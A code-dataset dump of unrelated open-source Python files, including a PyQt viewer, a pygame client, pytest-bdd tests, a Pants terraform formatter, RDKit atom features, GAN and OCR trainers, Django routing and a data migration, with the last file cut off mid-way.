self.update_curr_AIF()
# --------------------------------------------------------------------
def on_minContrastSlider_sliderMoved(self, value:int):
min_slider = int(value)
max_slider = max(min_slider + 1, self.ui.maxContrastSlider.value())
self.ui.maxContrastSlider.setValue(max_slider)
self.ui.scene1.update_raw_color_table(min_slider, max_slider)
self.set_contrast_label(min_slider, max_slider)
# --------------------------------------------------------------------
def on_maxContrastSlider_sliderMoved(self, value:int):
max_slider = int(value)
min_slider = min(max_slider-1, self.ui.minContrastSlider.value())
self.ui.minContrastSlider.setValue(min_slider)
self.ui.scene1.update_raw_color_table(min_slider, max_slider)
self.set_contrast_label(min_slider, max_slider)
# --------------------------------------------------------------------
def on_sliceSlider_sliderMoved(self, value:int):
next_slice = int(value)-1
if 0 <= next_slice < self.num_slices:
self.curr_slice = next_slice
self.update_volume_display()
# --------------------------------------------------------------------
@pyqtSlot()
def wheelEvent(self,event):
delta = event.angleDelta().y()
step = (delta and delta // abs(delta))
next_slice = self.curr_slice + step
if 0 <= next_slice < self.num_slices:
self.curr_slice = next_slice
self.ui.sliceSlider.setValue(self.curr_slice+1)
self.update_volume_display()
#---------------------------------------------------------------------
# def on_keypress_Callback(self, eventdata):
# update_dynamic = false
# update_slice = false
# switch eventdata.Key
# case 'rightarrow'
# if self.curr_AIF < self.num_AIFs
# self.curr_AIF = self.curr_AIF + 1
# update_dynamic = true
# case 'leftarrow'
# if self.curr_AIF > 1
# self.curr_AIF = self.curr_AIF - 1
# update_dynamic = true
# case 'uparrow'
# if self.curr_slice < self.num_slices
# self.curr_slice = self.curr_slice + 1
# update_slice = true
# case 'downarrow'
# if self.curr_slice > 1
# self.curr_slice = self.curr_slice - 1
# update_slice = true
# if update_slice
# set(ui.slice_slider, 'value', self.curr_slice)
# update_volume_display
# if update_dynamic
# set(ui.dynamic_slider, 'value', self.curr_AIF)
# update_dynamic_display
# #---------------------------------------------------------------------
# def on_scroll_Callback(hObject, eventdata) ##ok
# # Callback...
# if self.num_slices
# self.curr_slice = min(max(self.curr_slice + eventdata.VerticalScrollCount,1),self.num_slices)
# set(ui.slice_slider, 'value', self.curr_slice)
# update_volume_display
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
#---------------------- END OF CLASS -----------------------------------
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------------
if __name__ == "__main__":
app = QApplication(sys.argv)
aif_dir = None
init_image = 0
dynamic_image = None
if len(sys.argv) > 1:
aif_dir = sys.argv[1]
if len(sys.argv) > 2:
dynamic_image = sys.argv[2]
myapp = AIFViewerTool(aif_dir, dynamic_image)
myapp.show()
myapp.get_AIF_list(init_image)
myapp.load_dynamic_image()
sys.exit(app.exec_()) | 2.140625 | 2 |
client.py | starcreep48/HearthStoneBGLite | 2 | 12766375 | import os
import sys
from time import sleep
from colors import WOOD, BLACK, WHITE
import pygame
from renderer import Renderer
from renderer.Renderer import eventManager
from events import EventEnums
Renderer.initializeRenderer()
from gui.button import Button
import json
import glob
replays = glob.glob('replays/*')
f = open(replays[0])
replay = json.load(f)
VERSION = 'v0.0.1'
FONT = pygame.font.SysFont('calibri', 15)
fontColor = BLACK
# def versionInfo(dt):
# Renderer.screen.blit(FONT.render(VERSION, True, fontColor), (3, Renderer.getScreenResolution()[1] - 15))
def background(dt):
Renderer.screen.fill(WOOD)
def drawGame(dt):
# for t in replay:
Renderer.screen.blit(FONT.render(VERSION, True, fontColor), (3, Renderer.getScreenResolution()[1] - 15))
def quitGame(event, dt):
global running
running = False
clock = pygame.time.Clock()
eventManager.subscribe(EventEnums.quitGame, quitGame)
# def mainMenu():
# global running
# Renderer.addCallableToVersionLoop(versionInfo)
# running = True
# while True:
# dt = clock.tick(60)
# Renderer.processEventsAndCallables(dt)
# if not running: sys.exit()
running = True
Renderer.addCallableToBackgroundLoop(background)
# mainMenu()
while running:
dt = clock.tick(60)
Renderer.processEventsAndCallables(dt)
pygame.quit()
sys.exit() | 2.59375 | 3 |
tests/acceptance/scenarios/test_multi_reg_file_CRUD.py | aoxiangflysky/onedata | 2 | 12766376 | <gh_stars>1-10
"""Test suite for CRUD operations on regular files in onedata,
in multi-client environment.
"""
__author__ = "<NAME>"
__copyright__ = "Copyright (C) 2015 ACK CYFRONET AGH"
__license__ = "This software is released under the MIT license cited in " \
"LICENSE.txt"
from tests.acceptance.steps.env_steps import *
from tests.acceptance.steps.multi_auth_steps import *
from tests.acceptance.steps.multi_dir_steps import *
from tests.acceptance.steps.multi_file_steps import *
from tests.acceptance.steps.multi_reg_file_steps import *
from functools import partial
from pytest_bdd import scenario
import pytest
scenario = partial(scenario, '../features/multi_reg_file_CRUD.feature')
@scenario('Create regular file')
def test_create(env_description_file):
pass
@scenario('Create a file, read it on the second client, delete it, and repeat '
'the whole process')
def test_recreate_and_read(env_description_file):
pass
@scenario('Rename regular file without write permission on parent')
def test_rename_without_write_permission_on_parent(env_description_file):
pass
@scenario('Rename regular file with write permission on parent')
def test_rename_with_permission(env_description_file):
pass
@scenario('Delete regular file by owner')
def test_delete_by_owner(env_description_file):
pass
@scenario('Delete regular file by other user with write permission on parent')
def test_delete_by_other_user(env_description_file):
pass
@scenario('Fail to delete regular file by other user without write permission on parent')
def test_fail_to_delete_by_other_user_without_write_permission(env_description_file):
pass
@scenario('Read and write to regular file')
def test_read_write(env_description_file):
pass
@scenario('Read right after write by other client')
def test_read_right_after_write(env_description_file):
pass
@scenario('Read regular file without read permission')
def test_read_without_permission(env_description_file):
pass
@scenario('Write to regular file with write permission')
def test_write_with_permission(env_description_file):
pass
@scenario('Write to regular file without write permission')
def test_write_without_permission(env_description_file):
pass
@scenario('Execute file with execute permission')
def test_execute_with_permission(env_description_file):
pass
@scenario('Execute file without execute permission')
def test_execute_without_permission(env_description_file):
pass
@scenario('Move regular file and read')
def test_move(env_description_file):
pass
@scenario('Move big regular file and check MD5')
def test_move_big(env_description_file):
pass
@scenario('Copy regular file and read')
def test_copy(env_description_file):
pass
@scenario('Copy big regular file and check MD5')
def test_copy_big(env_description_file):
pass
@scenario('Deleting file opened by other user for reading')
def test_delete_file_opened_for_reading(env_description_file):
pass
@scenario('Deleting file opened by other user for reading and writing')
def test_delete_file_opened_for_rdwr(env_description_file):
pass
@scenario('Deleting file without permission should fail, file is opened by other user')
def test_delete_opened_file_without_permission(env_description_file):
pass
@scenario('Deleting file right after closing it')
def test_delete_right_after_close(env_description_file):
pass
@scenario("Create many children")
def test_create_many(env_description_file):
pass
@scenario('Create nonempty file then copy it and remove source file')
def test_copy_delete(env_description_file):
pass
@scenario('Create nonempty file then move it to another space')
def test_move_between_spaces(env_description_file):
pass
| 2.0625 | 2 |
main.py | Budu0101/PythonYoutubeVideoDownloader | 1 | 12766377 | from pytube import *
# Importing tkinter module
from tkinter import *
# creating root window for Tkinter
root = Tk()
# adding root window title and dimension for Tkinter
root.title("Python Youtube Video Downloader")
root.geometry('350x200')
# Passing the url in the pytube function, that is YouTube
yt = YouTube(video_url)
# adding a label to the root window
lbl = Label(root, text = "Please enter a valid Youtube URL: ")
lbl.grid()
# adding Entry Field
video_url = Entry(root, width=10)
video_url.grid(column =1, row =0)
# function to convert the Youtube URL into a .mp4 file in the current directory when button is clicked
def clicked():
# Passing the url in the pytube function, that is YouTube
yt = pytube.YouTube(video_url.get())
# Here you have to choose any one format of the stream (format contains mime_type, resolution, fps, vcodec, acodec). Also, you can change it if you want but I've chosen the first format.
video = yt.streams.first()
# Downloads the .mp4 file into the current directory. You can change it if you want.
video.download()
# button widget with text inside
btn = Button(root, text = "Start Converting" ,
fg = "black", command=clicked)
btn.grid(column=2, row=0)
root.mainloop()
| 3.828125 | 4 |
src/python/pants/backend/terraform/lint/tffmt/tffmt.py | yoav-orca/pants | 1,806 | 12766378 | <filename>src/python/pants/backend/terraform/lint/tffmt/tffmt.py
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import textwrap
from pants.backend.terraform.lint.fmt import TerraformFmtRequest
from pants.backend.terraform.style import StyleSetup, StyleSetupRequest
from pants.backend.terraform.tool import TerraformProcess
from pants.backend.terraform.tool import rules as tool_rules
from pants.core.goals.fmt import FmtResult
from pants.core.goals.lint import LintRequest, LintResult, LintResults
from pants.core.util_rules import external_tool
from pants.engine.fs import Digest, MergeDigests
from pants.engine.internals.selectors import Get, MultiGet
from pants.engine.process import FallibleProcessResult, ProcessResult
from pants.engine.rules import collect_rules, rule
from pants.engine.unions import UnionRule
from pants.option.subsystem import Subsystem
from pants.util.logging import LogLevel
logger = logging.getLogger(__name__)
class TfFmtSubsystem(Subsystem):
options_scope = "terraform-fmt"
help = """Terraform fmt options."""
@classmethod
def register_options(cls, register):
super().register_options(register)
register(
"--skip",
type=bool,
default=False,
help=(
f"Don't use `terraform fmt` when running `{register.bootstrap.pants_bin_name} fmt` and "
f"`{register.bootstrap.pants_bin_name} lint`."
),
)
class TffmtRequest(TerraformFmtRequest):
pass
@rule(desc="Format with `terraform fmt`")
async def tffmt_fmt(request: TffmtRequest, tffmt: TfFmtSubsystem) -> FmtResult:
if tffmt.options.skip:
return FmtResult.skip(formatter_name="tffmt")
setup = await Get(StyleSetup, StyleSetupRequest(request, ("fmt",)))
results = await MultiGet(
Get(ProcessResult, TerraformProcess, process)
for _, (process, _) in setup.directory_to_process.items()
)
def format(directory, output):
if len(output.strip()) == 0:
return ""
return textwrap.dedent(
f"""\
Output from `terraform fmt` on files in {directory}:
{output.decode("utf-8")}
"""
)
stdout_content = ""
stderr_content = ""
for directory, result in zip(setup.directory_to_process.keys(), results):
stdout_content += format(directory, result.stdout)
stderr_content += format(directory, result.stderr)
# Merge all of the outputs into a single output.
output_digest = await Get(Digest, MergeDigests(r.output_digest for r in results))
fmt_result = FmtResult(
input=setup.original_digest,
output=output_digest,
stdout=stdout_content,
stderr=stderr_content,
formatter_name="tffmt",
)
return fmt_result
@rule(desc="Lint with `terraform fmt`", level=LogLevel.DEBUG)
async def tffmt_lint(request: TffmtRequest, tffmt: TfFmtSubsystem) -> LintResults:
if tffmt.options.skip:
return LintResults([], linter_name="tffmt")
setup = await Get(StyleSetup, StyleSetupRequest(request, ("fmt", "-check")))
results = await MultiGet(
Get(FallibleProcessResult, TerraformProcess, process)
for _, (process, _) in setup.directory_to_process.items()
)
lint_results = [LintResult.from_fallible_process_result(result) for result in results]
return LintResults(lint_results, linter_name="tffmt")
def rules():
return [
*collect_rules(),
*external_tool.rules(),
*tool_rules(),
UnionRule(LintRequest, TffmtRequest),
UnionRule(TerraformFmtRequest, TffmtRequest),
]
| 1.992188 | 2 |
chemmltoolkit/features/atomFeatures.py | Andy-Wilkinson/ChemMLToolk | 1 | 12766379 | <reponame>Andy-Wilkinson/ChemMLToolk
from os import path
from rdkit.Chem import Mol
from chemmltoolkit.features.decorators import tokenizable_feature
from rdkit.Chem import Atom
from rdkit.Chem import AllChem
from rdkit.Chem import ChiralType
from rdkit.Chem import HybridizationType
from rdkit.Chem import rdCIPLabeler
class _ChemicalFeatureGenerator():
_instance = None
def __new__(cls):
if cls._instance is None:
cls._instance = super(
_ChemicalFeatureGenerator, cls).__new__(cls)
from rdkit import RDConfig
from rdkit.Chem import ChemicalFeatures
fdef_path = path.join(RDConfig.RDDataDir, 'BaseFeatures.fdef')
cls._instance.feature_factory = \
ChemicalFeatures.BuildFeatureFactory(fdef_path)
return cls._instance
def assign_features(self, mol: Mol):
for atom in mol.GetAtoms():
atom.SetProp('_Feature_Acceptor', '0')
atom.SetProp('_Feature_Donor', '0')
features = self.feature_factory.GetFeaturesForMol(mol)
for feature in features:
family = feature.GetFamily()
for atom_idx in feature.GetAtomIds():
atom = mol.GetAtomWithIdx(atom_idx)
if family == 'Acceptor':
atom.SetProp('_Feature_Acceptor', '1')
elif family == 'Donor':
atom.SetProp('_Feature_Donor', '1')
def atomic_number(atom: Atom) -> int:
"""Atomic number (int).
"""
return atom.GetAtomicNum()
def atomic_mass(atom: Atom) -> float:
"""Atomic mass (float).
"""
return atom.GetMass()
def charge(atom: Atom) -> int:
"""Formal charge (int).
"""
return atom.GetFormalCharge()
def charge_gasteiger(atom: Atom) -> float:
"""Gasteiger partial charge (float).
"""
if not atom.HasProp('_GasteigerCharge'):
mol = atom.GetOwningMol()
AllChem.ComputeGasteigerCharges(mol)
return atom.GetDoubleProp('_GasteigerCharge')
def charge_gasteiger_h(atom: Atom) -> float:
"""Gasteiger partial charge for implicit hydrogens (float).
"""
if not atom.HasProp('_GasteigerHCharge'):
mol = atom.GetOwningMol()
AllChem.ComputeGasteigerCharges(mol)
return atom.GetDoubleProp('_GasteigerHCharge')
@tokenizable_feature([ChiralType.CHI_UNSPECIFIED,
ChiralType.CHI_TETRAHEDRAL_CW,
ChiralType.CHI_TETRAHEDRAL_CCW,
ChiralType.CHI_OTHER])
def chiral_tag(atom: Atom) -> ChiralType:
"""Chirality of the atom (ChiralType)
"""
return atom.GetChiralTag()
def degree(atom: Atom) -> int:
"""Number of directly bonded neighbours (int).
"""
return atom.GetDegree()
@tokenizable_feature([HybridizationType.SP,
HybridizationType.SP2,
HybridizationType.SP3,
HybridizationType.SP3D,
HybridizationType.SP3D2])
def hybridization(atom: Atom) -> HybridizationType:
"""Hybridisation (HybridizationType).
"""
return atom.GetHybridization()
def hydrogens(atom: Atom) -> int:
"""Total number of hydrogen atoms (int).
"""
return atom.GetTotalNumHs()
def index(atom: Atom) -> int:
"""Index within the parent molecule (int).
"""
return atom.GetIdx()
def is_aromatic(atom: Atom) -> int:
"""If the atom is aromatic (0 or 1).
"""
return int(atom.GetIsAromatic())
def is_hbond_acceptor(atom: Atom) -> int:
"""If the atom is a hydrogen bond acceptor (0 or 1).
"""
if not atom.HasProp('_Feature_Acceptor'):
mol = atom.GetOwningMol()
_ChemicalFeatureGenerator().assign_features(mol)
return atom.GetIntProp('_Feature_Acceptor')
def is_hbond_donor(atom: Atom) -> int:
"""If the atom is a hydrogen bond donor (0 or 1).
"""
if not atom.HasProp('_Feature_Donor'):
mol = atom.GetOwningMol()
_ChemicalFeatureGenerator().assign_features(mol)
return atom.GetIntProp('_Feature_Donor')
def is_ring(atom: Atom) -> int:
"""If the atom is is in a ring (0 or 1).
"""
return int(atom.IsInRing())
def is_ringsize(ringSize: int) -> int:
"""If the atom is is in a ring of the specified size (0 or 1).
Args:
ringSize: The size of the ring.
"""
def _is_ringsize(atom: Atom):
return int(atom.IsInRingSize(ringSize))
_is_ringsize.__name__ = f'is_ringsize({ringSize})'
return _is_ringsize
def isotope(atom: Atom) -> int:
"""Isotope (int).
"""
return atom.GetIsotope()
def radical(atom: Atom) -> int:
"""Number of radical electrons (int).
"""
return atom.GetNumRadicalElectrons()
@tokenizable_feature(['', 'R', 'S'])
def stereochemistry(atom: Atom) -> str:
"""CIP sterochemistry label (string).
"""
mol = atom.GetOwningMol()
if not mol.HasProp('_CIPLabelsAssigned'):
rdCIPLabeler.AssignCIPLabels(mol)
mol.SetProp('_CIPLabelsAssigned', '1')
return atom.GetProp('_CIPCode') if atom.HasProp('_CIPCode') else ''
def symbol(atom: Atom) -> str:
"""Atomic symbol (string).
"""
return atom.GetSymbol()
| 2.078125 | 2 |
models/trainer/DCGAN_trainer.py | soumith/pytorch_GAN_zoo | 6 | 12766380 | import os
from ..DCGAN import DCGAN
from .gan_trainer import GANTrainer
from .standard_configurations.dcgan_config import _C
class DCGANTrainer(GANTrainer):
r"""
A trainer structure for the DCGAN and DCGAN product models
"""
_defaultConfig = _C
def getDefaultConfig(self):
return DCGANTrainer._defaultConfig
def __init__(self,
pathdb,
**kwargs):
r"""
Args:
pathdb (string): path to the input dataset
**kwargs: other arguments specific to the GANTrainer class
"""
GANTrainer.__init__(self, pathdb, **kwargs)
self.lossProfile.append({"iter": [], "scale": 0})
def initModel(self):
self.model = DCGAN(useGPU=self.useGPU,
**vars(self.modelConfig))
def train(self):
shift = 0
if self.startIter >0:
shift+= self.startIter
if self.checkPointDir is not None:
pathBaseConfig = os.path.join(self.checkPointDir, self.modelLabel
+ "_train_config.json")
self.saveBaseConfig(pathBaseConfig)
maxShift = int(self.modelConfig.nEpoch * len(self.getDBLoader(0)))
for epoch in range(self.modelConfig.nEpoch):
dbLoader = self.getDBLoader(0)
self.trainOnEpoch(dbLoader, 0, shiftIter=shift)
shift += len(dbLoader)
if shift > maxShift:
break
label = self.modelLabel + ("_s%d_i%d" %
(0, shift))
self.saveCheckpoint(self.checkPointDir,
label, 0, shift)
def initializeWithPretrainNetworks(self,
pathD,
pathGShape,
pathGTexture,
finetune=True):
r"""
Initialize a product gan by loading 3 pretrained networks
Args:
pathD (string): Path to the .pt file where the DCGAN discrimator is saved
pathGShape (string): Path to .pt file where the DCGAN shape generator
is saved
pathGTexture (string): Path to .pt file where the DCGAN texture generator
is saved
finetune (bool): set to True to reinitialize the first layer of the
generator and the last layer of the discriminator
"""
if not self.modelConfig.productGan:
raise ValueError("Only product gan can be cross-initialized")
self.model.loadG(pathGShape, pathGTexture, resetFormatLayer=finetune)
self.model.load(pathD, loadG=False, loadD=True,
loadConfig=False, finetuning=True)
| 2.234375 | 2 |
server/server/urls.py | kingbar1990/react-apollo-django-subscriptions-boilerplate | 0 | 12766381 | from graphene_django.views import GraphQLView
from server.token_auth import TokenAuthMiddleware
from server.channels import GraphQLSubscriptionConsumer
from channels.routing import ProtocolTypeRouter, URLRouter
from channels.http import AsgiHandler
from channels.auth import AuthMiddlewareStack
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
urlpatterns = [
path('admin/', admin.site.urls),
path('graphql/', csrf_exempt(GraphQLView.as_view(graphiql=True))),
path('gql/', csrf_exempt(GraphQLView.as_view(batch=True))),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
application = ProtocolTypeRouter({
"websocket": TokenAuthMiddleware(
URLRouter([
path('subscriptions', GraphQLSubscriptionConsumer)
]),
),
})
| 1.820313 | 2 |
train.py | GT-AcerZhang/PaddlePaddle-OCR | 0 | 12766382 | import os
import time
import numpy as np
import paddle.fluid as fluid
import config as cfg
from nets.attention_model import attention_train_net
from nets.crnn_ctc_model import ctc_train_net
from utils import data_reader
from utils.utility import get_ctc_feeder_data, get_attention_feeder_data
def main():
"""OCR training"""
if cfg.use_model == "crnn_ctc":
train_net = ctc_train_net
get_feeder_data = get_ctc_feeder_data
else:
train_net = attention_train_net
get_feeder_data = get_attention_feeder_data
# define network
sum_cost, error_evaluator, inference_program, model_average = train_net(cfg, cfg.data_shape, cfg.num_classes)
# data reader
train_reader = data_reader.train(batch_size=cfg.batch_size,
prefix_path=cfg.train_prefix,
cycle=cfg.total_step > 0,
model=cfg.use_model)
test_reader = data_reader.test(prefix_path=cfg.test_prefix, model=cfg.use_model)
# prepare environment
place = fluid.CUDAPlace(0) if cfg.use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
# 加载初始化模型
if cfg.init_model:
fluid.load(program=fluid.default_main_program(),
model_path=cfg.init_model,
executor=exe,
var_list=fluid.io.get_program_parameter(fluid.default_main_program()))
print("Init model from: %s." % cfg.init_model)
train_exe = exe
error_evaluator.reset(exe)
if cfg.parallel:
train_exe = fluid.ParallelExecutor(use_cuda=cfg.use_gpu, loss_name=sum_cost.name)
fetch_vars = [sum_cost] + error_evaluator.metrics
def train_one_batch(data):
var_names = [var.name for var in fetch_vars]
if cfg.parallel:
results = train_exe.run(var_names,
feed=get_feeder_data(data, place))
results = [np.array(r).sum() for r in results]
else:
results = exe.run(program=fluid.default_main_program(),
feed=get_feeder_data(data, place),
fetch_list=fetch_vars)
results = [r[0] for r in results]
return results
def test():
error_evaluator.reset(exe)
for data in test_reader():
exe.run(inference_program, feed=get_feeder_data(data, place))
_, test_seq_error = error_evaluator.eval(exe)
return test_seq_error[0]
def save_model():
if not os.path.exists(cfg.model_path):
os.makedirs(cfg.model_path)
fluid.save(program=fluid.default_main_program(),
model_path=os.path.join(cfg.model_path, "model"))
print("Saved model to: %s" % cfg.model_path)
iter_num = 0
stop = False
while not stop:
total_loss = 0.0
total_seq_error = 0.0
# train a pass
for data in train_reader():
if cfg.total_step < iter_num:
stop = True
break
result = train_one_batch(data)
total_loss += result[0]
total_seq_error += result[2]
iter_num += 1
# training log
if iter_num % cfg.log_period == 0:
print("[%s] - Iter[%d]; Avg loss: %.3f; Avg seq err: %.3f"
% (time.asctime(time.localtime(time.time())), iter_num,
total_loss / (cfg.log_period * cfg.batch_size),
total_seq_error / (cfg.log_period * cfg.batch_size)))
total_loss = 0.0
total_seq_error = 0.0
# evaluate
if iter_num % cfg.eval_period == 0:
if model_average:
with model_average.apply(exe):
test_seq_error = test()
else:
test_seq_error = test()
print("\n[%s] - Iter[%d]; Test seq error: %.3f\n" %
(time.asctime(time.localtime(time.time())), iter_num, test_seq_error))
# save model
if iter_num % cfg.save_model_period == 0:
if model_average:
with model_average.apply(exe):
save_model()
else:
save_model()
if __name__ == "__main__":
main()
| 2.296875 | 2 |
ddht/base_message.py | pipermerriam/ddht | 2 | 12766383 | from dataclasses import dataclass
from typing import Generic, TypeVar
from eth_typing import NodeID
from eth_utils import int_to_big_endian
import rlp
from ddht.endpoint import Endpoint
class BaseMessage(rlp.Serializable): # type: ignore
message_type: int
def to_bytes(self) -> bytes:
return b"".join((int_to_big_endian(self.message_type), rlp.encode(self)))
TMessage = TypeVar("TMessage", bound=BaseMessage)
TResponseMessage = TypeVar("TResponseMessage", bound=BaseMessage)
@dataclass(frozen=True)
class OutboundMessage(Generic[TMessage]):
message: BaseMessage
receiver_endpoint: Endpoint
receiver_node_id: NodeID
def __str__(self) -> str:
return f"{self.__class__.__name__}[{self.message.__class__.__name__}]"
@dataclass(frozen=True)
class InboundMessage(Generic[TMessage]):
message: TMessage
sender_endpoint: Endpoint
sender_node_id: NodeID
def __str__(self) -> str:
return f"{self.__class__.__name__}[{self.message.__class__.__name__}]"
def to_response(
self, response_message: TResponseMessage
) -> OutboundMessage[TResponseMessage]:
return OutboundMessage(
message=response_message,
receiver_endpoint=self.sender_endpoint,
receiver_node_id=self.sender_node_id,
)
AnyInboundMessage = InboundMessage[BaseMessage]
AnyOutboundMessage = OutboundMessage[BaseMessage]
| 2.265625 | 2 |
backend/custom_models/migrations/0013_upload_background_tree_view_info.py | code-for-canada/django-nginx-reactjs-docker | 3 | 12766384 | <reponame>code-for-canada/django-nginx-reactjs-docker
# Generated by Django 2.1.7 on 2019-05-30 14:07
# Edited by <NAME> to upload the background tree view
# content (one in Organizational Structure section and one in Team
# Information section) of the image descriptions for the sample test
from django.db import migrations
def upload_background_tree_view_info(apps, schema_editor):
# get models
language = apps.get_model("custom_models", "Language")
item_type = apps.get_model("custom_models", "ItemType")
item = apps.get_model("custom_models", "Item")
item_text = apps.get_model("custom_models", "ItemText")
test = apps.get_model("custom_models", "Test")
# get db alias
db_alias = schema_editor.connection.alias
# lookup languages; do not use bulk_create since we need these objects later on
l_english = (
language.objects.using(db_alias)
.filter(ISO_Code_1="en", ISO_Code_2="en-ca")
.last()
)
l_french = (
language.objects.using(db_alias)
.filter(ISO_Code_1="fr", ISO_Code_2="fr-ca")
.last()
)
emib_sample_item_id = (
test.objects.using(db_alias).filter(test_name="emibSampleTest").last().item_id
)
it_background = (
item_type.objects.using(db_alias).filter(type_desc="background").last()
)
background_id = (
item.objects.using(db_alias)
.filter(parent_id=emib_sample_item_id, item_type_id=it_background, order=0)
.last()
)
# create item_types; do not use bulk_create since we need these objects later on
it_tree_view = item_type(type_desc="tree-view")
it_tree_view.save()
it_organizational_structure_tree_child = item_type(type_desc="organizational-structure-tree-child")
it_organizational_structure_tree_child.save()
it_team_information_tree_child = item_type(type_desc="team-information-tree-child")
it_team_information_tree_child.save()
# create items; do not use bulk_create since we need these objects later on
# organizational structure tree view
i_tree_view_of_org_structure = item(
parent_id=background_id, item_type_id=it_tree_view, order=1
)
i_tree_view_of_org_structure.save()
# organizational structure tree view children
i_tree_view_of_org_structure_person_1 = item(
parent_id=i_tree_view_of_org_structure, item_type_id=it_organizational_structure_tree_child, order=1
)
i_tree_view_of_org_structure_person_1.save()
i_tree_view_of_org_structure_person_2 = item(
parent_id=i_tree_view_of_org_structure_person_1, item_type_id=it_organizational_structure_tree_child, order=1
)
i_tree_view_of_org_structure_person_2.save()
i_tree_view_of_org_structure_person_3 = item(
parent_id=i_tree_view_of_org_structure_person_2, item_type_id=it_organizational_structure_tree_child, order=1
)
i_tree_view_of_org_structure_person_3.save()
i_tree_view_of_org_structure_person_4 = item(
parent_id=i_tree_view_of_org_structure_person_2, item_type_id=it_organizational_structure_tree_child, order=2
)
i_tree_view_of_org_structure_person_4.save()
i_tree_view_of_org_structure_person_5 = item(
parent_id=i_tree_view_of_org_structure_person_2, item_type_id=it_organizational_structure_tree_child, order=3
)
i_tree_view_of_org_structure_person_5.save()
i_tree_view_of_org_structure_person_6 = item(
parent_id=i_tree_view_of_org_structure_person_1, item_type_id=it_organizational_structure_tree_child, order=2
)
i_tree_view_of_org_structure_person_6.save()
i_tree_view_of_org_structure_person_7 = item(
parent_id=i_tree_view_of_org_structure_person_1, item_type_id=it_organizational_structure_tree_child, order=3
)
i_tree_view_of_org_structure_person_7.save()
i_tree_view_of_org_structure_person_8 = item(
parent_id=i_tree_view_of_org_structure_person_1, item_type_id=it_organizational_structure_tree_child, order=4
)
i_tree_view_of_org_structure_person_8.save()
i_tree_view_of_org_structure_person_9 = item(
parent_id=i_tree_view_of_org_structure_person_8, item_type_id=it_organizational_structure_tree_child, order=1
)
i_tree_view_of_org_structure_person_9.save()
i_tree_view_of_org_structure_person_10 = item(
parent_id=i_tree_view_of_org_structure_person_8, item_type_id=it_organizational_structure_tree_child, order=2
)
i_tree_view_of_org_structure_person_10.save()
i_tree_view_of_org_structure_person_11 = item(
parent_id=i_tree_view_of_org_structure_person_8, item_type_id=it_organizational_structure_tree_child, order=3
)
i_tree_view_of_org_structure_person_11.save()
i_tree_view_of_org_structure_person_12 = item(
parent_id=i_tree_view_of_org_structure_person_8, item_type_id=it_organizational_structure_tree_child, order=4
)
i_tree_view_of_org_structure_person_12.save()
# team information tree view
i_tree_view_of_team_info = item(
parent_id=background_id, item_type_id=it_tree_view, order=2
)
i_tree_view_of_team_info.save()
# team information tree view children
i_tree_view_of_team_info_person_1 = item(
parent_id=i_tree_view_of_team_info, item_type_id=it_team_information_tree_child, order=1
)
i_tree_view_of_team_info_person_1.save()
i_tree_view_of_team_info_person_2 = item(
parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=1
)
i_tree_view_of_team_info_person_2.save()
i_tree_view_of_team_info_person_3 = item(
parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=2
)
i_tree_view_of_team_info_person_3.save()
i_tree_view_of_team_info_person_4 = item(
parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=3
)
i_tree_view_of_team_info_person_4.save()
i_tree_view_of_team_info_person_5 = item(
parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=4
)
i_tree_view_of_team_info_person_5.save()
i_tree_view_of_team_info_person_6 = item(
parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=5
)
i_tree_view_of_team_info_person_6.save()
i_tree_view_of_team_info_person_7 = item(
parent_id=i_tree_view_of_team_info_person_1, item_type_id=it_team_information_tree_child, order=6
)
i_tree_view_of_team_info_person_7.save()
# bulk create item_text
item_text.objects.using(db_alias).bulk_create(
[
item_text(
item_id=i_tree_view_of_org_structure_person_1,
text_detail="<NAME> (President)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_1,
text_detail="<NAME> (Présidente)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_2,
text_detail="<NAME> (Corporate Affairs Director)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_2,
text_detail="<NAME> (Directeur, Affaires ministérielles)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_3,
text_detail="<NAME> (Human Resources Manager)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_3,
text_detail="<NAME> (Gestionnaire, Ressources humaines)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_4,
text_detail="<NAME> (Finance Manager)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_4,
text_detail="<NAME> (Gestionnaire, Finances)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_5,
text_detail="<NAME> (Information Technology Manager)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_5,
text_detail="<NAME> (Gestionnaire, Technologies de l'information)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_6,
text_detail="<NAME> (Research and Innovations Director)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_6,
text_detail="<NAME> (Directrice, Recherche et innovations)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_7,
text_detail="<NAME> (Program Development Director)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_7,
text_detail="<NAME> (Directeur, Développement de programmes)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_8,
text_detail="<NAME> (Services and Communications Director)",
language=l_english,
),
item_text(
item_id=i_tree_view_of_org_structure_person_8,
text_detail="<NAME> (Directrice, Services et communications)",
language=l_french,
),
item_text(
item_id=i_tree_view_of_org_structure_person_9,
text_detail="<NAME> (Quality Assurance Manager - You)",
language=l_english,
),
item_text(
